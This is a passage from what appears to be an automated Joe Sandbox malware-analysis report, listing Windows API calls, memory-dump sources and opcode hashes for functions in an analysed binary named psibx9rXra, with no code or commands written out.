                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                • String ID: 0
                                                • API String ID: 4152858687-4108050209
                                                • Opcode ID: 60853cd5614066a57de1818278d088f609152efc789c2d5f3f0b5b7f20a8bacc
                                                • Instruction ID: c5d1e99a6f3b20a7ede8dcd3e3f98713aa8c8b28e64ee9998c44bdbfc171c9fe
                                                • Opcode Fuzzy Hash: 60853cd5614066a57de1818278d088f609152efc789c2d5f3f0b5b7f20a8bacc
                                                • Instruction Fuzzy Hash: 5751D1B19083419BD7A49E2DD885A6F77ECAF89330F24092DF895D3190EB74CD04E752
                                                APIs
                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDD5D4
                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FDD60A
                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FDD61B
                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FDD69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                • String ID: DllGetClassObject
                                                • API String ID: 753597075-1075368562
                                                • Opcode ID: 2f04515c78d8bf84cefe53f2c75d041269d5e2f213bd84ddbce20dfb4f556687
                                                • Instruction ID: 67bd429ff1cc0287333de209f370895c414c035e31884ad32bc72fba87e8a6ea
                                                • Opcode Fuzzy Hash: 2f04515c78d8bf84cefe53f2c75d041269d5e2f213bd84ddbce20dfb4f556687
                                                • Instruction Fuzzy Hash: 9E41AEB1600204EFDB15CF64CC84B9A7BAAEF44314F1981AAEC099F305D7B5D940EBE0
                                                APIs
                                                • _memset.LIBCMT ref: 00FE27C0
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FE27DC
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00FE2822
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01045890,00000000), ref: 00FE286B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                • Opcode ID: 75a2748bb678d5e0f917cab47c90a08d082eab6f796ff24866f3c7fd36766f8f
                                                • Instruction ID: 4e2073d7d8cc450d71b66501de3bbe0fc804aa54c8a6ab768a8482e2638d46bc
                                                • Opcode Fuzzy Hash: 75a2748bb678d5e0f917cab47c90a08d082eab6f796ff24866f3c7fd36766f8f
                                                • Instruction Fuzzy Hash: 8741EF716043819FD764DF26CC44B1ABBE8EF85320F044A2EF9A5972D2E734EA05DB52
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00FFD7C5
                                                  • Part of subcall function 00F8784B: _memmove.LIBCMT ref: 00F87899
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: BuffCharLower_memmove
                                                • String ID: cdecl$none$stdcall$winapi
                                                • API String ID: 3425801089-567219261
                                                • Opcode ID: b4aff1b98583038b7ec82caaa5e3abab016527a4989b6d01895e977fc530eeaf
                                                • Instruction ID: 8e8c2bf64ae7ec40690b540ddb2dfd13d25c7b38e3e413872a9da89fc20a46ac
                                                • Opcode Fuzzy Hash: b4aff1b98583038b7ec82caaa5e3abab016527a4989b6d01895e977fc530eeaf
                                                • Instruction Fuzzy Hash: A931ADB1904619ABCF00EF54CC519FEB3B9FF05320B108629E865A76E1DB75ED05DB80
                                                APIs
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                  • Part of subcall function 00FDAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAABC
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FD8F14
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FD8F27
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FD8F57
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove$ClassName
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 365058703-1403004172
                                                • Opcode ID: 3577754c2c2854a9977142a7988b88c6994f9cfeef6bbf33bec64143cbb4d696
                                                • Instruction ID: 3f1546fc33316dae81531b3a739aac9b788f8d3a98d8224f567f7488243c08d6
                                                • Opcode Fuzzy Hash: 3577754c2c2854a9977142a7988b88c6994f9cfeef6bbf33bec64143cbb4d696
                                                • Instruction Fuzzy Hash: 1721D2B6A00105BBDB24ABB0DC85DFEB77ADF453A0F18461AF461972E1DE3D480AB710
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FF184C
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF1872
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FF18A2
                                                • InternetCloseHandle.WININET(00000000), ref: 00FF18E9
                                                  • Part of subcall function 00FF2483: GetLastError.KERNEL32(?,?,00FF1817,00000000,00000000,00000001), ref: 00FF2498
                                                  • Part of subcall function 00FF2483: SetEvent.KERNEL32(?,?,00FF1817,00000000,00000000,00000001), ref: 00FF24AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3113390036-3916222277
                                                • Opcode ID: a5dcc3eb8759ebb9c97f67b2e1f8f963eaf7ec691e06623015b0f5ec85ace63d
                                                • Instruction ID: 3c7d918ea53edf1192833b397450135f69f92bff50e21dec430768d8bf385251
                                                • Opcode Fuzzy Hash: a5dcc3eb8759ebb9c97f67b2e1f8f963eaf7ec691e06623015b0f5ec85ace63d
                                                • Instruction Fuzzy Hash: 1821CFB150020CBFEB229B60CC84EBF76ACFF48794F10412AF605D2250EA698D04A7A1
                                                APIs
                                                  • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                                                  • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                                                  • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01006461
                                                • LoadLibraryW.KERNEL32(?), ref: 01006468
                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0100647D
                                                • DestroyWindow.USER32(?), ref: 01006485
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                • String ID: SysAnimate32
                                                • API String ID: 4146253029-1011021900
                                                • Opcode ID: a0ff72039b54567a91bfc418c34b914830537cdfa5355181c219cf512ab88bf1
                                                • Instruction ID: fc78b81e79fc85516ffbe9db9094d55279410bc6fc280fa6c76c743ffd16df03
                                                • Opcode Fuzzy Hash: a0ff72039b54567a91bfc418c34b914830537cdfa5355181c219cf512ab88bf1
                                                • Instruction Fuzzy Hash: 5C217F71500205AFFF224F68DC40EBB77EFEF49364F114629FA90970D1DA7698619760
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 00FE6DBC
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FE6DEF
                                                • GetStdHandle.KERNEL32(0000000C), ref: 00FE6E01
                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FE6E3B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 79a015593d48efd7095aebbb79afe188180bba16c6049d2a7ba90d4b0fa2c3ed
                                                • Instruction ID: e7e98504bb87d9d3e8b7f099fdfd40ee0b92f933edc33e7f355dd494877b5708
                                                • Opcode Fuzzy Hash: 79a015593d48efd7095aebbb79afe188180bba16c6049d2a7ba90d4b0fa2c3ed
                                                • Instruction Fuzzy Hash: 4B21B275A0024EABDB309F2ADC04A9A77F8EFA4770F204A19FCA0D72D0D7719811AB54
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 00FE6E89
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FE6EBB
                                                • GetStdHandle.KERNEL32(000000F6), ref: 00FE6ECC
                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FE6F06
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 19947b5734f643d2005a7803655dd1ff156a43cc3d8129757feb959c4e34369d
                                                • Instruction ID: 6d7d4da023a6589a636c7f1fccc6ab57a7fe145cc7a2bcacb48ab95b93e17da6
                                                • Opcode Fuzzy Hash: 19947b5734f643d2005a7803655dd1ff156a43cc3d8129757feb959c4e34369d
                                                • Instruction Fuzzy Hash: 5021B67590034A9BDB309F6ADC04A9A77E8EF65770F200A59FCE0D72D0D7719850E754
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00FEAC54
                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FEACA8
                                                • __swprintf.LIBCMT ref: 00FEACC1
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0100F910), ref: 00FEACFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu
                                                • API String ID: 3164766367-685833217
                                                • Opcode ID: d0cebd90e568009c854d57defff27dcc051008ae80b0bca2c48ce8cdced58a51
                                                • Instruction ID: fb77d5e587314f0516bdc6916932716e04d610317151cb80f827a3140a108944
                                                • Opcode Fuzzy Hash: d0cebd90e568009c854d57defff27dcc051008ae80b0bca2c48ce8cdced58a51
                                                • Instruction Fuzzy Hash: 4D21A134A00109AFCB20EF65CD45DEE7BB8FF89314B0440A9F809DB251DB75EA41EB21
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 00FE1B19
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                • API String ID: 3964851224-769500911
                                                • Opcode ID: 42f6c5f2f31d3212f7f1102477bbdbd5a99d25d3cb182783b988f9b41ea98c49
                                                • Instruction ID: b48ff4ce43d6780e6f5537db7899b501b9d0d108971d5b12d841017e4e55bc81
                                                • Opcode Fuzzy Hash: 42f6c5f2f31d3212f7f1102477bbdbd5a99d25d3cb182783b988f9b41ea98c49
                                                • Instruction Fuzzy Hash: 3411AD719002598FCF00EFA6DC519FEB3B4FFA6304B148499E855A7292EB365D0AEB40
                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FFEC07
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FFEC37
                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00FFED6A
                                                • CloseHandle.KERNEL32(?), ref: 00FFEDEB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                • String ID:
                                                • API String ID: 2364364464-0
                                                • Opcode ID: f4a0ee1112fbd483d442a6ecdce2453d6b4d427094048d9667f204aec0b784bf
                                                • Instruction ID: 1d48c478472bdb88474e59dc95451b09f2f80c637e21bfdf8692de083a56c569
                                                • Opcode Fuzzy Hash: f4a0ee1112fbd483d442a6ecdce2453d6b4d427094048d9667f204aec0b784bf
                                                • Instruction Fuzzy Hash: 9E8192716043019FD760EF28CC46F6AB7E5AF84720F44881DFA9ADB2A2D7B4AC41DB51
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                • String ID:
                                                • API String ID: 1559183368-0
                                                • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                • Instruction ID: a186439168035372146d4f335b84c4f4989d07f515fc902091249446a00dee7b
                                                • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                • Instruction Fuzzy Hash: B051E4F1E00B05DFCB24CEA9DC406AE77A6AF46B34F288729F825962D0D770DD50AB40
                                                APIs
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                  • Part of subcall function 01000E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFDAD,?,?), ref: 01000E31
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010000FD
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0100013C
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01000183
                                                • RegCloseKey.ADVAPI32(?,?), ref: 010001AF
                                                • RegCloseKey.ADVAPI32(00000000), ref: 010001BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                • String ID:
                                                • API String ID: 3440857362-0
                                                • Opcode ID: 5f6b9119d9f420524f48574a33da44768ea7578cc928e6636055c84ceee4fbc0
                                                • Instruction ID: 3a61fbb1247765570036f695b209fce5fe7c663e58b6c6d57fb71583f8b2ec07
                                                • Opcode Fuzzy Hash: 5f6b9119d9f420524f48574a33da44768ea7578cc928e6636055c84ceee4fbc0
                                                • Instruction Fuzzy Hash: E9517771208205AFE715EF68CC81FAAB7E9FF84314F04881DF59587291DB35E908DB52
                                                APIs
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FFD927
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00FFD9AA
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FFD9C6
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00FFDA07
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FFDA21
                                                  • Part of subcall function 00F85A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE7896,?,?,00000000), ref: 00F85A2C
                                                  • Part of subcall function 00F85A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE7896,?,?,00000000,?,?), ref: 00F85A50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                • String ID:
                                                • API String ID: 327935632-0
                                                • Opcode ID: 2883671f3d2c80ef21a22c388fee293ad6debf11ca291375820406ceaac695ec
